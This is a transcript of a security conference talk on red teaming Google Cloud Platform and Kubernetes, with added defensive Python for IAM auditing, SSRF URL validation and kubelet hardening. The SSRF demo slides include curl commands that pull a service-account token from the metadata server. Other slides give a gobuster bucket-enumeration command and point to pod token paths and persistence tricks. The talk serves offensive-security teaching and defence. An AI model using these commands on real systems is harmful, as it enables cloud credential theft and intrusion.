May the Cloud be with You: Red Teaming GCP (Google Cloud Platform)

More research on Red Teaming GCP (Google Cloud Platform) & K8s presented at SaintCon on October 24th 2019.

Also see the YouTube video: https://www.youtube.com/watch?v=gTFPn-Z7Cc4

Cloud services are frequently misconfigured due to their rapid adoption and engineers not fully understanding the security ramifications of different configurations, which can frequently enable red teams to gain, expand, and persist access within Google Cloud Platform (GCP) environments. In this talk we will dive into how GCP services are commonly breached (e.g. SSRF vulnerabilities, discovering insecure cloud storage), and then show how attackers are expanding access within Docker & Kubernetes (K8s) environments (e.g. CVEs, insecure daemons). Finally we will demonstrate some unique techniques for persisting access within GCP environments for prolonged periods of time!

TweekFawkes

October 24, 2019

Transcript

  1. Stage 2 Security, Version 1.0. Copyright 2019 by Stage 2 Security.
    May the Cloud Be with You! Red Teaming GCP (Google Cloud Platform)
  2. Agenda
    Bryce Kunz @TweekFawkes
    - Who Am I?
    - GCP Overview
    - Compute Engine
    - Storage
    - Kubernetes (K8s)
    - Persistence for GCP
  3. Past
    WhoAmI: Defense - DHS SOC; Offense - NSA Red Team; Adobe Digital Exp. (DX)
  4. WhoAmI - The Present
    Services
    • Hack (Pentest)
    • Hunt (Splunk ES)
    • Teach (BlackHat)
  5. WhoAmI - The Present
  6. GCP: Cloud Overview
  7. Management UI
    [diagram: Management UI, Control Plane (APIs) and Data Plane, with a Cloud Admin using the Management UI]
  8. GCP: Management UI
    Web Management Console -> https://Console.Cloud.Google.com
  9. Control Plane (APIs)
    [diagram: Control Plane (APIs), Data Plane, Management UI, Cloud Admin; external Cloud Automation reaching the Control Plane - Terraform - Salt Cloud - Custom]
  10. Data Plane
    [diagram: as on slide 9, with USERS reaching the Data Plane]
  11. GCP: Roles
    GCP Roles are a collection of permissions
    • GCP Roles are similar to AWS IAM Policies
    Permissions enable you to take certain actions:
    • e.g. compute.instances.start
  12. GCP: Roles - Primitive
    Role Primitives:
    • Owner -> Billing & Access
    • Editor -> Changes & Updates
    • Viewer -> Read-Only
    Pre-date the Cloud Identity & Access Management (IAM) service in GCP
    • Generally overly permissive and/or too broad
  13. GCP: Roles - Predefined
    Role Predefined:
    • Granular access to specific GCP resources (IAM)
      ◦ roles/pubsub.subscriber
    Role Custom:
    • Project and/or Organization level roles w/ granular permissions
  14. GCP: Cloud Identity & Access Management (IAM)
    Authorization for GCP Resources
    • Introduced in early 2016
    "Member" is one of the following
    • user, group, domain, service account, or public
    Cloud IAM does NOT directly manage identities, hence these reference:
    • an individual Google account, Google Groups, a G Suite / Cloud Identity domain
    Every identity has a unique email address
  15. GCP: Cloud IAM Policies
    Policies bind Members to Roles at a specific hierarchy level:
    • Org
    • Folder
    • Project
    • Resource
    Who can do what to which thing?
  16. GCP: Accounts
    Three General Types of Creds:
    • User Accounts
    • API Keys
    • Service Accounts
  17. GCP: Cloud Identity
    Identity as a Service
    • Users
    • Groups
    Similar to the AWS IAM service or Active Directory
    Supports MFA and Security Key Enforcement (e.g. Hardware Device)
    Google Cloud Directory Sync -> LDAP and Active Directory Sync
  18. GCP: Cloud Resource Manager
    Manage & secure an organization's projects
    Similar to AWS Organizations
  19. GCP: Cloud Audit Logging (Stackdriver)
    Audit Logs -> Who, What, When, and Where
    Logs
    • Admin Activity -> 400 days of retention for free
    • Data Access -> 7 days of retention for free, 30 days of retention for $
    NOTE: covers GCP services only, so it does not log apps running on GCE
    Similar to AWS CloudTrail
  20. GCP: Cloud KMS
    Encryption service (AES256) designed to protect secrets
    • Secrets out of the code base and into the environment
    • Does not store secrets
    • Encrypts and/or decrypts secrets stored elsewhere
    • Control access to keys for encryption and/or decryption
    Integrated with IAM for Authorization & Cloud Audit Logging
    • Key rotation and key versioning for decryption
    Similar to AWS KMS & Vault by HashiCorp
  21. GCP: Service Account
    Service Accounts are accounts for applications
    • Similar to AWS IAM Roles
    Service Accounts can be assumed by an application (or user, if authorized)
    • Should use least privilege
  22. GCP: User Managed Keys
    Two Types of Keys:
    • user managed keys
      ◦ generate/download private keys
      ◦ (e.g. for AWS to access GCP)
      ◦ expire 10 years from creation
    • GCP managed keys
    Ref: https://cloud.google.com/iam/docs/understanding-service-accounts
  23. GCP: GCP Managed Keys
    Two Types of Keys:
    • GCP managed keys
      ◦ GCP native secrets
      ◦ preferred for GCP services
      ◦ (e.g. GCF, GAE, GCE, GKE, etc.)
      ◦ automatically rotated
      ◦ used for a maximum of two weeks
    Ref: https://cloud.google.com/iam/docs/understanding-service-accounts
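Slides 11 to 16 describe roles, members and the policy bindings that tie them together. The following Python is an added example, not code from the deck: it audits a policy in the getIamPolicy binding format for the two weaknesses those slides call out (primitive roles and public members) and answers the "who can do what" question for one member. SAMPLE_POLICY, the e-mail addresses and the project number are constructed.

```python
"""Audit a GCP IAM policy for primitive roles (Owner/Editor/Viewer, which
pre-date Cloud IAM and are broad) and "public" members (allUsers and
allAuthenticatedUsers). Added example; SAMPLE_POLICY is constructed."""
from typing import Dict, List

# Primitive roles grant access to everything in the project.
PRIMITIVE_ROLES = {"roles/owner", "roles/editor", "roles/viewer"}

# Public members carry no "user:"/"group:"/"serviceAccount:" prefix.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Constructed policy in the shape returned by getIamPolicy: a list of
# bindings, each a role plus the members bound to it. The service account
# mimics the default Compute Engine SA (PROJECT_NUMBER-compute@...) that a
# new GCE VM runs as unless told otherwise; the project number is a
# placeholder.
SAMPLE_POLICY: Dict = {
    "bindings": [
        {"role": "roles/owner", "members": ["user:alice@example.com"]},
        {"role": "roles/editor", "members": [
            "serviceAccount:123456789012-compute@developer.gserviceaccount.com"]},
        {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
        {"role": "roles/pubsub.subscriber", "members": ["group:devs@example.com"]},
    ]
}


def audit_policy(policy: Dict) -> List[str]:
    """One finding per risky (role, member) pair, sorted for stable output."""
    findings: List[str] = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                # Public exposure is reported regardless of how narrow the role is.
                findings.append(f"PUBLIC: {role} -> {member}")
            elif role in PRIMITIVE_ROLES:
                findings.append(f"PRIMITIVE: {role} -> {member}")
    return sorted(findings)


def roles_for_member(policy: Dict, member: str) -> List[str]:
    """Answer 'what can this identity do?' for one member string, e.g. the
    service account whose token a metadata-server SSRF would expose."""
    return sorted(b["role"] for b in policy.get("bindings", [])
                  if member in b.get("members", []))


def member_type(member: str) -> str:
    """Classify a member string by the IAM prefix conventions on slide 14."""
    if member in PUBLIC_MEMBERS:
        return "public"
    prefix, _, _ = member.partition(":")
    return prefix if prefix in {"user", "group", "domain", "serviceAccount"} else "unknown"


if __name__ == "__main__":
    for finding in audit_policy(SAMPLE_POLICY):
        print(finding)
```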
  24. GCP: GCE New VM Instance
    Google Compute Engine (GCE) defaults when creating a VM:
    • Identity and API Access
    • Firewall
    • Startup script (Optional)
    • Metadata (Optional)
    Defaults:
    • Block project-wide SSH keys (unchecked)
    • Disk Encryption (Google-managed key)
    ...
  25. GCP: GCE Identity and API Access
    Default access scopes:
    • read-only access to Storage and Service Management,
    • write access to Stackdriver Logging and Monitoring,
    • read/write access to Service Control.
    ...
  26. GCP: GCE Startup Script
    GCE Startup Script:
    • runs under the root user
    ...
  27. GCP: GCE Metadata
    Access scopes:
    • read-only access to Storage and Service Management,
    • write access to Stackdriver Logging and Monitoring,
    • read/write access to Service Control.
    ...
  28. Compute Engine Overview
  29. Data Center: Server Side Request Forgery (SSRF)
    [diagram: Internet -> Data Center Firewall -> Web App, with internal Database, Monitoring (10.1.1.1) and Images (10.1.1.2) hosts; request 1 is GET /app?img=b.jpg, followed by arrows 2-4]
  30. Server Side Request Forgery (SSRF)
    [diagram: same layout; request 1 is GET /?img=http://10.1.1.1/... so the web app fetches from the internal monitoring host; arrows 0-4]
  31. GCP: Server Side Request Forgery (SSRF)
    [diagram: Internet -> GCP Firewall -> Instance running the Web App, with Database, Images and metadata.google.internal (169.254.169.254); request 1 is GET /?img=http://metadata/..; arrows 0-4]
  32-33. GCP: Metadata Service
    [diagram as on slide 31]
  34-35. GCP: Metadata Service HTTP Header
    [diagram as on slide 31]
  36. GCP: v1beta1 ?
    [diagram as on slide 31]
  37. GCP: v1beta1 !
    [diagram as on slide 31]
  38. GCP: SSRF Demo
    Steps on macOS:
    • curl http://35.247.8.30/
    ...
  39. GCP: SSRF Demo
    Steps on macOS:
    • curl http://34.73.197.205/
    • View Source
      ◦ /extimage?p=http%3A...%2Fsalamander.jpg
    • curl http://34.73.197.205/extimage?p=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
    ...
  40. GCP: SSRF Demo
    Steps on macOS:
    • curl http://35.247.8.30/
    • View Source
      ◦ /extimage?p=http%3A...%2Fsalamander.jpg
    ...
  41. GCP: SSRF Demo (repeat of slide 39)
  42. GCP: SSRF Demo
    Steps on macOS:
    • curl http://35.247.8.30/
    • View Source
      ◦ /extimage?p=http%3A...%2Fsalamander.jpg
    • curl http://35.247.8.30/extimage?p=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
    ...
  43. GCP: SSRF Demo (repeat of slide 42)
  44. GCP: Validate User Tokens
    https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ACCESS_TOKEN
    ...
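The SSRF slides above (29 to 44) show the image-proxy path that reaches the metadata server. As an added example that is not the demo application's code, this Python check is the fix side: the URL validator an /extimage-style fetcher would run before making the outbound request, refusing the metadata hostnames and link-local address, the internal 10.x hosts of the data-center diagram, and numeric or DNS disguises of them. The make_static_resolver helper and the hostnames in SAMPLE_RESOLVER are constructed.

```python
"""Outbound URL check for an image-proxy endpoint like the talk's
/extimage?p=<url>. Added example, not the demo app's code. Refuses any
fetch that could land on the GCE metadata server (metadata.google.internal
/ 169.254.169.254, whose legacy v1beta1 path needed no Metadata-Flavor
header) or on non-public addresses such as the 10.1.1.1 monitoring host.
The static resolver and its sample hostnames are constructed."""
import ipaddress
import socket
from typing import Callable, Dict, Iterable, Tuple
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]

# Names GCE maps to the metadata server (plus anything under google.internal).
METADATA_HOSTS = {"metadata", "metadata.google.internal"}
ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> Iterable[str]:
    """All A records for host. gethostbyname_ex also normalises numeric
    disguises such as 0xa9fea9fe or 2852039166 to 169.254.169.254, so the
    address check below sees them."""
    return socket.gethostbyname_ex(host)[2]


def make_static_resolver(table: Dict[str, Iterable[str]]) -> Resolver:
    """Offline resolver for tests; unknown names fail like a real lookup."""
    def resolve(host: str) -> Iterable[str]:
        if host not in table:
            raise socket.gaierror(f"constructed: no such host {host}")
        return table[host]
    return resolve


# Constructed lookup table standing in for DNS.
SAMPLE_RESOLVER = make_static_resolver({
    "images.example.com": ["93.184.216.34"],
    "rebind.example.com": ["93.184.216.34", "169.254.169.254"],
    "0xa9fea9fe": ["169.254.169.254"],
    "localhost": ["127.0.0.1"],
})


def is_safe_fetch_url(url: str, resolver: Resolver = system_resolver) -> Tuple[bool, str]:
    """Return (ok, reason); ok is False unless every address the host
    resolves to is public. TOCTOU caveat: the fetcher must then connect to
    the vetted address rather than re-resolve the name (DNS rebinding)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False, "missing host"
    if host in METADATA_HOSTS or host.endswith(".google.internal"):
        return False, "metadata hostname"
    try:
        addrs = [ipaddress.ip_address(host)]        # IP literal, v4 or v6
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"resolution failed: {exc}"
    for addr in addrs:
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped                 # e.g. ::ffff:169.254.169.254
        # link-local covers 169.254.0.0/16; private covers the RFC 1918 hops.
        if (addr.is_link_local or addr.is_private or addr.is_loopback
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
            return False, f"{addr} is not a public address"
    return True, "ok"
```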
  45. GCP: Default Access ...
  46. GCP: Management UI
    Web Management Console -> https://Console.Cloud.Google.com
  47-48. GCP: Compute Engine Identity and API Access
  49. GCP: Full Access ...
  50. SSH Agents Overview
  51. GCP: GCE SSH
    SSH Access to VM: ...
  52. GCP: GCE SSH
    SSH Agents ...
  53. Storage Overview
  54-55. 2017: May-Oct
    1. “Internal Accenture Data, Customer Information Exposed in Public Amazon S3 Bucket”
    2. “Another Wide-Open Amazon S3 Bucket Exposes Verizon Customer Account Data”
    3. “US voter info stored on wide-open cloud box, thanks to bungling Republican contractor”
    4. “Researcher discovers classified Army intel app, data on open public AWS bucket”
    5. “Millions of Time Warner Cable Customer Records Exposed in Third-Party Data Leak”
    6. “Drone Manufacturer DJI Leaves SSL Key Exposed on Public Repository”
    7. “Dow Jones becomes the latest organization to be affected by an AWS cloud data leakage due to misconfiguration and user error.”
    etc...
  56. GCP: Storage
    Public Buckets... ...
  57. GCP: Accessing Objects
    https://storage.googleapis.com/its_all_in_the_cloud/object001.jpg
    storage.googleapis.com -> GCP
    its_all_in_the_cloud -> Globally Unique Bucket Name
    object001.jpg -> Object Name
    ...
  58. GCP: Listable Buckets ...
  59. GoBuster - Finding Buckets & Objects
    https://storage.googleapis.com/its_all_in_the_cloud/object001.jpg
    gobuster -m dir -u "https://storage.googleapis.com" -i -t 100 -e -s 200,204 -w quickdir.txt
  60. Kubernetes (K8s) Overview
  61. Kubernetes Overview: Master Node & API
    Overview:
    • VM / Instance running the following services:
      ◦ kube-apiserver,
      ◦ kube-controller-manager and
      ◦ kube-scheduler.
    [diagram: Infrastructure - Cloud (e.g. Instances) or On-Premises (e.g. VMs); Control; Admin]
  62. Kubernetes Overview: etcd
    Overview:
    • Holds state information for the cluster
      ◦ “Access to etcd is equivalent to root permission in the cluster so ideally only the API server should have access to it.”
  63. Kubernetes Overview: kubectl
    Overview:
    • kubectl is a CLI to admin the cluster
    [diagram adds: Admin -> CLI (kubectl) -> Control]
  64. Kubernetes Overview: Dashboard
    Overview:
    • Dashboard is a web-based UI for K8s clusters
    ...
    [diagram adds: Admin -> Browser -> Dashboard]
  65. Tesla K8s hacked! Unsecured Admin Console... ...
  66. Kubernetes Overview: Worker Nodes
    Overview:
    • Nodes are VMs / Instances w/
      ◦ Container Runtime (e.g. Docker)
      ◦ Kube-proxy
      ◦ Kubelet
        ▪ Port: 10250/TCP
        ▪ Port: 10255/TCP
    ...
    [diagram adds: Workers]
  67. Kubernetes Overview: Pods
    Overview:
    • Pod contains 1 or more containers
      ◦ Smallest unit in K8s
    ...
  68. Kubernetes Overview: Services
    Overview:
    • Services map K8s names to pod IPs
      ◦ When nodes get stopped/started
      ◦ Services continue to route
    • Similar to a load balancer/proxy
      ◦ endpoint lookup...
      ◦ more magic be here
      ◦ ref: kube-proxy, etc...
    ...
  69. Kubernetes Overview: Load Balancers
    Overview:
    • Load Balancing via GCP Services
    ...
  70. GCP: SSRF Demo
    Steps on macOS:
    • curl http://34.73.197.205/
    • View Source
      ◦ /extimage?p=http%3A...%2Fsalamander.jpg
    • curl http://34.73.197.205/extimage?p=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
    ...
  71. GCP: SSRF Demo ... .sh
  72. Kubernetes Overview
    Overview:
    • Pod contains 1 or more containers
    ...
    [diagram: Infrastructure - Cloud (e.g. Instances) or On-Premises (e.g. VMs); Workers; Control; kubectl]
  73. Voodoo: /bin/cat /proc/1/cgroup ...
  74. Voodoo: ls / ...
  75. Voodoo: pid 1 is not init or launchd ...
  76. Default Service Account
    Find secrets:
    • /var/run/secrets/kubernetes.io/serviceaccount/token
    ...
  77. Voodoo: Python via Memory Only
    Container Escape Vulnerabilities:
    • CVE-2019-5736 -> runc
    ...
  78. Voodoo: Python via Memory Only
    Overview:
    • Pod contains 1 or more containers
    ...
  79. Voodoo: pyscript
    Container Escape Vulnerabilities:
    • CVE-2019-5736 -> runc
    ...
  80. Container Escapes
    Container Escape Vulnerabilities:
    • CVE-2019-5736 -> runc
    ...
  81. Voodoo: pyscript to access_token via metadata
    Overview:
    • Pod contains 1 or more containers
    ...
    [diagram adds: metadata.google.internal 169.254.169.254]
  82. Voodoo: pyscript to access_token via metadata
    Container Escape Vulnerabilities:
    • CVE-2019-5736 -> runc
    ...
  83. .../v1beta1/instance/attributes/kube-env
    • Masquerading as the Kubelet
    • To the K8s API
    ...
  84. Kubelet certificate and the Kubelet private key
    • Masquerading as the Kubelet
    • To the K8s API
    ...
  85. Kubelet -> Port: 10250/TCP, 10255/TCP
    Container Escape Vulnerabilities:
    • CVE-2019-5736 -> runc
    ...
  86. Kubelet -> Port: 10250/TCP, 10255/TCP
    Overview:
    • Pod contains 1 or more containers
    ...
  87. Kubelet -> Port: 10250/TCP, 10255/TCP (repeat of slide 85)
  88. Kubelet -> Port: 10250/TCP, 10255/TCP ...
  89. Container Escapes
    Container Escape Vulnerabilities:
    • CVE-2019-5736 -> runc
    • CVE-2016-5195 -> Dirty COW
    ...
  90. Container Escapes
    Container Escape Techniques:
    • Run Container in Cluster
      ◦ With Root File System Mounted!
    ...
  91. Kubernetes API
    Kubernetes API Vulnerabilities:
    • CVE-2018-1002105 -> kubernetes: authentication/authorization bypass
    ...
  92. Docker: 2375/TCP (no auth.), 2376/TCP (TLS)
    Lateral Movement:
    • EDB-ID: 42356 -> Unprotected TCP Socket
    ...
  93. K8s Defense Overview
  94. Network Security
    Highly recommend...
    • Isovalent.com w/ Cilium
      ◦ To lock down network traffic
      ◦ via namespaces
        ▪ ... alternatively Istio
    ...
  95. Update Kubernetes Cluster
    • Updates Frequently
    • New Security Features Regularly Added
    • Defaults Get Stronger
    ...
  96. Kubelet -> Configure Authentication
    • Enable “NodeRestriction”
    • --anonymous-auth=false
    ...
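For the kubelet hardening on slide 96 and the 10250/10255 kubelet ports on slide 66, an added example that is not from the talk: a Python audit of a KubeletConfiguration file (the file form of the --anonymous-auth=false flag) and of the API server's admission-plugin flag, which is where NodeRestriction is actually enabled. Both sample configs and the flag lists are constructed.

```python
"""Check a node's KubeletConfiguration and the kube-apiserver flags for
the hardening on the K8s defense slides: no anonymous kubelet auth, the
read-only port (10255/TCP) closed, authorization not AlwaysAllow, and
the NodeRestriction admission plugin on so a caller holding a kubelet
identity is confined to its own node's objects. Added example; both
sample configs are constructed. Field names follow the
kubelet.config.k8s.io/v1beta1 schema."""
from typing import Dict, List

# Constructed: a node run with the permissive legacy flag defaults.
WEAK_KUBELET: Dict = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True},
                       "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
}

# Constructed: the same node with the slide's recommendations applied.
HARDENED_KUBELET: Dict = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": False},
                       "webhook": {"enabled": True}},
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
}


def audit_kubelet(cfg: Dict) -> List[str]:
    """Findings for one KubeletConfiguration. Missing keys take the
    schema defaults (anonymous off, webhook on, Webhook authz, port 0)."""
    findings: List[str] = []
    auth = cfg.get("authentication", {})
    if auth.get("anonymous", {}).get("enabled", False):
        findings.append("anonymous requests accepted on 10250/TCP; "
                        "set authentication.anonymous.enabled: false")
    if not auth.get("webhook", {}).get("enabled", True):
        findings.append("bearer-token review via the API server disabled; "
                        "set authentication.webhook.enabled: true")
    if cfg.get("authorization", {}).get("mode", "Webhook") == "AlwaysAllow":
        findings.append("authorization.mode AlwaysAllow authorizes every "
                        "request to the kubelet API; set Webhook")
    port = cfg.get("readOnlyPort", 0)
    if port:
        findings.append(f"unauthenticated read-only port {port}/TCP open; "
                        "set readOnlyPort: 0")
    return findings


def audit_apiserver_flags(flags: List[str]) -> List[str]:
    """Findings for kube-apiserver command-line flags (constructed input)."""
    plugins: List[str] = []
    for flag in flags:
        name, _, value = flag.partition("=")
        if name == "--enable-admission-plugins":
            plugins.extend(p.strip() for p in value.split(","))
    if "NodeRestriction" not in plugins:
        return ["NodeRestriction admission plugin not enabled; a stolen "
                "kubelet credential can modify any node or pod object"]
    return []


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_KUBELET), ("hardened", HARDENED_KUBELET)):
        print(name, audit_kubelet(cfg) or ["ok"])
```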
  97. Persistence in GCP Overview
  98. Client-Side Vectors:
    • Remote Mac Exploitation Via Custom URL Schemes
    Ref: https://objective-see.com/blog/blog_0x38.html
  99-103. CLI: gcloud ...
  104. Browser Cookies
    Client-Side:
    • cookie_crimes -> https://github.com/defaultnamehere/cookie_crimes
    GCP Ref: https://wunderwuzzi23.github.io/blog/passthecookie.html
  105. Cloud Shell
    Client-Side:
    • cookie_crimes -> https://github.com/defaultnamehere/cookie_crimes
    GCP ...
  106. Cloud Shell: .bashrc modification • ...
  107. Cloud Shell -> .bashrc -> Voodoo • ...
  108. Cloud Shell -> .bashrc -> Voodoo -> Private Key • ...
  109. Persistence in K8s Overview
  110. Default Service Account
    Find secrets:
    • /var/run/secrets/kubernetes.io/serviceaccount/token
    ...
  111. AuthN - Authentication (AuthN)
    • Prove Your ID
    ...
    [diagram: AuthN - Bearer Tokens - Client Certs - OIDC, AD, etc.; Control; kubectl]
  112. AuthZ - Authorization (AuthZ)
    • Is User Allowed...
    ...
    [diagram: AuthN (Bearer Tokens, Certs, OIDC, AD, ...) -> AuthZ (Roles, RoleBindings); Control; kubectl]
  113. Admission Control
    • Policy Enforcement
    ...
    [diagram adds: Admission Control (Mutating, Validating) after AuthZ]
  114. External Admission Control
    • Policy Enforcement
    ...
    [diagram adds: External Admission Control via Webhooks]
  115. Mutating! Admission Control
    • Policy Enforcement
    ...
    [diagram as on slide 114]
  116. Trainings @ BlackHat & On-Site! Thank You! Bryce@Stage2Sec.com .sh @TweekFawkes